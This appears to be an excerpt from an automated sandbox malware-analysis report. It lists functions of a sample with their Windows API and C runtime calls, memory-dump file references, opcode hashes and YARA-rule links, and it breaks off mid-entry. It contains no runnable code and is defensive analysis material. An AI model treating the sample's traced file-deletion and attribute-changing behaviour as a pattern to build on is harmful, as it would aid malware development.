Opcode ID: c0e1d07e0a850f133a1bc45ded329e55b31414210d0f15b9a1d4eefbb553867f
Instruction ID: c2cfc0a2235a5e87532e02d880bbeb878a016bc831ea289a736c2ee95b08eacd
Opcode Fuzzy Hash: c0e1d07e0a850f133a1bc45ded329e55b31414210d0f15b9a1d4eefbb553867f
Instruction Fuzzy Hash: 94F0E235A4810976CB156B62EC66AD93B58AB41318F24402FFC0695591DF3CFDC5868D

Function 0040852B Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 004085D3

Part of subcall function 00410823: _wcsncpy.LIBCMT ref: 0041083A

Strings

lB, xrefs: 0040867B

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcscpy_wcsncpy
String ID: lB
API String ID: 61306229-323450203
Opcode ID: 29149b8486b6adac1c4e54a3afb5b0cb0c3871d1621f901de47ab55ff35e2088
Instruction ID: 103a58baa05930c9378de64f2962b06913be03748a020ebcdecdd149c9e069be
Opcode Fuzzy Hash: 29149b8486b6adac1c4e54a3afb5b0cb0c3871d1621f901de47ab55ff35e2088
Instruction Fuzzy Hash: F851F731504144AACF21AE648E859FF37688B56304F16087FF9C5B73C2CA3E8C85975E

Function 004080F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004080F5

Part of subcall function 00407F5D: __EH_prolog.LIBCMT ref: 00407F62

Strings

lB, xrefs: 00408283

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog
String ID: lB
API String ID: 3519838083-323450203
Opcode ID: 339fbb9184cc942aba44bf293f10f5ac3a776cdc16ff60d33c7e031d5c85ee74
Instruction ID: 0a1a8c58c61574b9b0333402115fdb142e78c728f2fcd81d1704bff6031d242b
Opcode Fuzzy Hash: 339fbb9184cc942aba44bf293f10f5ac3a776cdc16ff60d33c7e031d5c85ee74
Instruction Fuzzy Hash: 9E41BD31900618EBDF14AF91CD42AEA7775AF41704F0440BEEA497B2D2CB786E45CB69

Function 022917A1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000218), ref: 0229183F

Strings

kL, xrefs: 022917AA, 02291802

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: LongNamePath
String ID: kL
API String ID: 82841172-2496334608
Opcode ID: 241245e99bfbef9596039d4900aa27c8ff6b8e54742629117780be22d654b086
Instruction ID: 85a9c10b93fe6f906db657b007f4e96b00ba070b1a1f4ce62967ce3a45a67434
Opcode Fuzzy Hash: 241245e99bfbef9596039d4900aa27c8ff6b8e54742629117780be22d654b086
Instruction Fuzzy Hash: 61212971A6020EA6DF14DBE6EC49AFA73A9FF55300F6005A9E41EC7184E7309961DB50

Function 00416D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00416DA1

Part of subcall function 00414F5B: _memset.LIBCMT ref: 00414F6F
Part of subcall function 00414F5B: _memset.LIBCMT ref: 00414F8A
Part of subcall function 00414F5B: _memset.LIBCMT ref: 00414FE1

Strings

lB, xrefs: 00416D60

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _memset
String ID: lB
API String ID: 2102423945-323450203
Opcode ID: 45512c126a182eb73f96b96e4e4e61670663b11b625d16f8a7cdea84c1466f0f
Instruction ID: 37c4a38e13e4494c5614bf404c0b6c02a1badd40d6e150641bedbf9ffa0c83f3
Opcode Fuzzy Hash: 45512c126a182eb73f96b96e4e4e61670663b11b625d16f8a7cdea84c1466f0f
Instruction Fuzzy Hash: 5821C5B1600A809BC721DE39D8807EAB7E5EB4531AF018C2FE5699B341D738E981CF58

Function 004016CE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004016D3

Strings

CMT, xrefs: 0040173C

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 959695e3af591dadd077a55fdc18d985d261133e4173b4917ee6667d8de57ae5
Instruction ID: 54a74378d9f4caaf32509a2907d6515583790e049b7064e6243dd4886224a737
Opcode Fuzzy Hash: 959695e3af591dadd077a55fdc18d985d261133e4173b4917ee6667d8de57ae5
Instruction Fuzzy Hash: 8321D575600654AFCF05AF64C8508AEBB69AF45314F04806EF896773E2CB399E41CB69

Function 00401274 Relevance: 3.1, APIs: 2, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401279

Part of subcall function 00402BA4: __EH_prolog.LIBCMT ref: 00402BA9

_wcslen.LIBCMT ref: 0040131B

Part of subcall function 004197A3: ___sbh_find_block.LIBCMT ref: 004197CC
Part of subcall function 004197A3: ___sbh_free_block.LIBCMT ref: 004197DB
Part of subcall function 004197A3: GetLastError.KERNEL32(00000000,00000000,00429578,0000000C,0041E244,00000000,004298A0,0000000C,0041E27E,00000000,00419CF5,?,00423A76,00000004,00429A40,0000000C), ref: 0041981C

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog$ErrorLast___sbh_find_block___sbh_free_block_wcslen
String ID:
API String ID: 3798303308-0
Opcode ID: df58e2bec009990b8100a990398cffe66055091cc66e7b39624638c927f14ddc
Instruction ID: 4cfb938cf6160edf3e7808a47aca77b20e6138c2b5def0451c264f645c9f735e
Opcode Fuzzy Hash: df58e2bec009990b8100a990398cffe66055091cc66e7b39624638c927f14ddc
Instruction Fuzzy Hash: EF219F31C00219EBCF11AF95E841AEEBBB9AF48708F10417FF811B21A1C77D19519B99

Function 0229F5D5 Relevance: 3.1, APIs: 2, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 0229F622

Part of subcall function 0229F983: RtlInitializeSListHead.NTDLL(022E48A8), ref: 0229F988

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0229F68C

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 69202f3eeb972429ddba5b25e32bb932189cece6fb132bd84ded11eea4b1b5e7
Instruction ID: 10cb09e42c0af2d7fad3c9ad91b18b658a88f8c48b2fd64d77b774fed301bf3d
Opcode Fuzzy Hash: 69202f3eeb972429ddba5b25e32bb932189cece6fb132bd84ded11eea4b1b5e7
Instruction Fuzzy Hash: D3212632AB83819EEF90FBF4AA1579C37D29F05369F100459D8A1EBAE9DB604040CE25

Function 0040F142 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040F147

Part of subcall function 00401788: __EH_prolog.LIBCMT ref: 0040178D
Part of subcall function 00401788: _memset.LIBCMT ref: 004018D3
Part of subcall function 00401788: _memset.LIBCMT ref: 004018E2
Part of subcall function 00401788: _memset.LIBCMT ref: 004018F1

Part of subcall function 004016CE: __EH_prolog.LIBCMT ref: 004016D3

_malloc.LIBCMT ref: 0040F1AF

Part of subcall function 0041C2DE: __FF_MSGBANNER.LIBCMT ref: 0041C301
Part of subcall function 0041C2DE: __NMSG_WRITE.LIBCMT ref: 0041C308
Part of subcall function 0041C2DE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001), ref: 0041C355

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: H_prolog_memset$AllocateHeap_malloc
String ID:
API String ID: 47157355-0
Opcode ID: 075d6e2109519fb30cfb052b084912381f159b7a6281ad439503faf44ca86e10
Instruction ID: 28130a522ea1f1181dc9059b476446ffb52416e1d2ad285f7c741a74d34e2598
Opcode Fuzzy Hash: 075d6e2109519fb30cfb052b084912381f159b7a6281ad439503faf44ca86e10
Instruction Fuzzy Hash: 102167B2900259DFCB11DF99C8809EEBBB4BF09318F14007FE41AB7291DB395A49CB64

Function 0040DAD2 Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 0040A0C9: _wcsncpy.LIBCMT ref: 0040A0E8

_swprintf.LIBCMT ref: 0040DB1B
SetDlgItemTextW.USER32(00000065,?), ref: 0040DB32

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ItemText_swprintf_wcsncpy
String ID:
API String ID: 2444572147-0
Opcode ID: 1987c9497c4c2ec1e82adad3159d1d02946cef441ef0d6fe948741306ed1f94d
Instruction ID: 6eadc209e9c1c49b6d8139f6daa10ac0a14171367b877a8bca27eb2da8358c34
Opcode Fuzzy Hash: 1987c9497c4c2ec1e82adad3159d1d02946cef441ef0d6fe948741306ed1f94d
Instruction Fuzzy Hash: 7AF0FC71500308B5EB10E7A0CC86F9A3B6C9B04744F0500BAB204B50D1DA759A95CBA9

Function 00408987 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,771B20B0,00000000,004084FA,?,00406E86,?,00000000,?,00000800,?,?,?,?,?,00000000), ref: 004089A8

Strings

lB, xrefs: 004089C8

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: CloseHandle
String ID: lB
API String ID: 2962429428-323450203
Opcode ID: ba7a975211f5a9e7d3bc834a54581ac86f47199770ad2771ff7e8f6f2bb1967d
Instruction ID: aa1bb7b18bb7cf047748d38db68985a3d69a47c67909f6350a8d97187e2b0de3
Opcode Fuzzy Hash: ba7a975211f5a9e7d3bc834a54581ac86f47199770ad2771ff7e8f6f2bb1967d
Instruction Fuzzy Hash: D6F0E2B05427104BD33076B847483B337D89B12331F08872FD4E2A32D1DB7DA8494B5A

Function 00408FE4 Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,00000000,771B3110,?,?,0040927F,?,?,?,00406E31,?,?,?), ref: 00408FFF

Part of subcall function 0040A5D3: _wcslen.LIBCMT ref: 0040A5ED
Part of subcall function 0040A5D3: _wcsncpy.LIBCMT ref: 0040A624
Part of subcall function 0040A5D3: _wcscpy.LIBCMT ref: 0040A62E

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0040927F,?,?,?,00406E31,?,?,?), ref: 0040902C

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: AttributesFile$_wcscpy_wcslen_wcsncpy
String ID:
API String ID: 1770613603-0
Opcode ID: a879b4608ec852c8fb212142d05917fb69a815091193c39ae2d413685fc7b376
Instruction ID: bea34a86155dea3f025df7f3e2fa713b727de01319cb637a94e51e388e902359
Opcode Fuzzy Hash: a879b4608ec852c8fb212142d05917fb69a815091193c39ae2d413685fc7b376
Instruction Fuzzy Hash: FFF0A031141229BADF11AA60DC01FDA3B5CAF043D4F488023BC84A7190DB75DE95EAA4

Function 0040903B Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,-00000009,00000000,?,0040870C,?,?,00000001,?,?,?,?,?,?,00406E86,?), ref: 00409053

Part of subcall function 0040A5D3: _wcslen.LIBCMT ref: 0040A5ED
Part of subcall function 0040A5D3: _wcsncpy.LIBCMT ref: 0040A624
Part of subcall function 0040A5D3: _wcscpy.LIBCMT ref: 0040A62E

DeleteFileW.KERNEL32(?,?,?,00000800,?,0040870C,?,?,00000001,?,?,?,?,?,?,00406E86), ref: 0040907D

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: DeleteFile$_wcscpy_wcslen_wcsncpy
String ID:
API String ID: 1811046493-0
Opcode ID: bcbe461a772df30d986d2132bbb3efae58862733e45b31bb938c371bed5dd360
Instruction ID: 2842e0246cb0c92567f7b58113ba661988c26c59797c62abd3e8f5ab0e2f46a2
Opcode Fuzzy Hash: bcbe461a772df30d986d2132bbb3efae58862733e45b31bb938c371bed5dd360
Instruction Fuzzy Hash: B2E0223124122AA6DB10AB60CC01FDB3B9CAF043D5F084073BD84A31E1DB74DD94DAB4

Function 00408F98 Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,771B3110,?,00409205,?,00409247,?,?,00406E31,?,?,?), ref: 00408FB0

Part of subcall function 0040A5D3: _wcslen.LIBCMT ref: 0040A5ED
Part of subcall function 0040A5D3: _wcsncpy.LIBCMT ref: 0040A624
Part of subcall function 0040A5D3: _wcscpy.LIBCMT ref: 0040A62E

GetFileAttributesW.KERNEL32(?,?,?,00000800,?,00409205,?,00409247,?,?,00406E31,?,?,?), ref: 00408FD8

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: AttributesFile$_wcscpy_wcslen_wcsncpy
String ID:
API String ID: 1770613603-0
Opcode ID: e9d98861f01fd9d19c00489613874ebf97a6b2f5bd18fcf808d3d81f8ebab78d
Instruction ID: e8fbbc9c55ef58848b20d7b58562d5d9a2c3566e41e168d69c76d702a677ee75
Opcode Fuzzy Hash: e9d98861f01fd9d19c00489613874ebf97a6b2f5bd18fcf808d3d81f8ebab78d
Instruction Fuzzy Hash: AEE09B326002182ACF10A669DC00BDB379E9B883A5F040177F644E32D0DBB4DD85CBE4

Function 00419362 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000,00000000,004349D8,0040FD5A), ref: 00419373
FreeLibrary.KERNEL32(?,00000000,004349D8,0040FD5A), ref: 0041937D

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 87cc2e9fa7f807a3b307f0e1411869635d4d8fb71b69247945e2787b503a5221
Instruction ID: 4deb4dc1eba71034df55e9c1270a6008095a78b74773f60a8cff26fbadc79a94
Opcode Fuzzy Hash: 87cc2e9fa7f807a3b307f0e1411869635d4d8fb71b69247945e2787b503a5221
Instruction Fuzzy Hash: 0EE0EC357016249B8724DB69DC0498AF3ACAF99B21316046AE819E3260C774EC42CEA8

Function 00405FD6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00405FEB
ShowWindow.USER32(00000000), ref: 00405FF2

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 1c172d71844c4af62843ecbcaddec7adf4f269459f05f4589533bf47ca82abe2
Instruction ID: 636c1db902bbace9bc44299634c3d1d0cf8dedf33613c34b19b0ab6c256b7f2c
Opcode Fuzzy Hash: 1c172d71844c4af62843ecbcaddec7adf4f269459f05f4589533bf47ca82abe2
Instruction Fuzzy Hash: F2C01272258101FECB011F70EC09C2A7BA89BD4211F15C954B0A9C0060C238C010DB25

Function 00457D98 Relevance: 1.8, APIs: 1, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9378db31d0e77431aec107a267e01e0143a0bbd0a431125cdcb333837633e23a
Instruction ID: 8b913672f5ef7adeebd12494a0165e36b41289a5b00c19f4be9a645052ee5250
Opcode Fuzzy Hash: 9378db31d0e77431aec107a267e01e0143a0bbd0a431125cdcb333837633e23a
Instruction Fuzzy Hash: 5EC11971A08215AFCB1ADF48C99099EF3F5BFC8B08F10881EE588D7245E770AD15DB96

Function 00462761 Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3456c4c149cfddc1b8055f145b0cfa7c03715a28baa2b91cb0fb22c0a44730fb
Instruction ID: 6c91a6995b6bb8cc3dde157e4eac339e28c64846cc40dc66bac51218e07dfa72
Opcode Fuzzy Hash: 3456c4c149cfddc1b8055f145b0cfa7c03715a28baa2b91cb0fb22c0a44730fb
